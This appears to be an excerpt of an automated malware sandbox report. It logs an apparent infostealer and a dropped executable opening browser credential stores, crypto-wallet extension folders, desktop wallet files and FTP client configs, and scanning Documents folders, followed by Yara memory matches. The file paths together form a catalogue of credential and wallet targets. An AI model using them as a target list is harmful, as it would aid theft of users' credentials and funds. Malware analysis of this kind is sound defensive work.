Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: number of queries: 1523
Source: Yara match File source: 00000009.00000003.2803022659.0000000001301000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2954765378.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2933392825.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2123562004.0000000001781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2123613018.0000000001782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 21024c5511.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 21024c5511.exe PID: 4228, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: 036e90e395.exe PID: 5316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 3440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 21024c5511.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 21024c5511.exe PID: 4228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 26.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.996773cd54.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.996773cd54.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000002.3081504525.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3081627351.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2911813021.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2876974078.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.3066155076.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2819953969.0000000000CD1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
